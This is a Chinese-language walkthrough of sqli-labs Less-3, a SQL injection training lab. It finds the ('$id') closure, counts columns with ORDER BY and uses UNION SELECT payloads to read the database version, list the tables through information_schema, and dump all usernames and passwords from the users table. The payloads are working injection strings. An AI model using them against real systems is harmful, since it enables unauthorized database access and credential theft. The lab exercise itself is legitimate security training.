Less-3:GET - Error based - single quotes with twist - string
基于单引号和括号的错误
一、判断网页是否为动态网页
Please input the ID as parameter with numeric value输入ID作为带数值的参数
尝试在url地址中输入?id=1传参,成功获取到了两条数据,输入?id=2时返回不同的数据
证明该网页是一个动态网页
二、判断是否存在sql注入漏洞
尝试在?id=1后面添加一个单引号',提示语法错误,这里我们可以看见
' '1' ') LIMIT 0,1 ',这里是用('$id')的方式闭合的
尝试输入?id=1') and 1=1-- -,正常显示数据,未报错
输入?id=1') and 1=2-- -未显示内容,没有输出,没有执行sql查询,可以得出结论,此处存在sql注入漏洞
三、判断原查询语句的查询参数个数和显示的位
使用order by来进行判断
输入?id=1') order by 5-- -,提示报错,减小数值
输入?id=1') order by 4-- -,提示报错,减小数值
输入?id=1') order by 3-- -,未报错,则原查询语句查询了三个参数
接下来判断显示的位数,先使前面报错,id改为-1,然后使用联合查询union
输入?id=-1') union select 1,2,3-- -,可以看见显示的位是2号位和3号位
四、获取MySQL数据库的版本和当前库名
使用version()函数获取版本,database()函数获取当前库名,因为一号位不显示,所以在二号位和三号位使用函数
输入?id=-1') union select 1,version(),database()-- -,成功获取到数据库版本5.7.26,和当前的库名security
MySQL数据库版本在5.0以上,说明可以利用information_schema这个库,获取到当前库所有的表,和表中所有的列
五、爆库
输入?id=-1') union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() -- -
这里只显示了一个表,可以通过group_concat()函数将查询到的多行数据显示在一行中
输入?id=-1') union select 1,2,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database() -- -
通过group_concat()显示出了四个表emails,referers,uagents,users
程序员可能会对显示的结果做位数限制,所以也可以用limit分页来查询,比如
输入?id=-1') union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1-- -
输入?id=-1') union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1-- -
六、爆表
在emails,referers,uagents,users这四个表中,users最有可能存放用户的重要信息,爆出users表中的数据
输入?id=-1') union select 1,2,group_concat(COLUMN_NAME) from information_schema.COLUMNS where COLUMNS.TABLE_SCHEMA='security' and COLUMNS.TABLE_NAME='users' -- -
可以看到里面的列,id,username和password
获取username和对应的password
输入?id=-1') union select 1,group_concat(username),group_concat(password) from users-- -
成功获取所有用户名和密码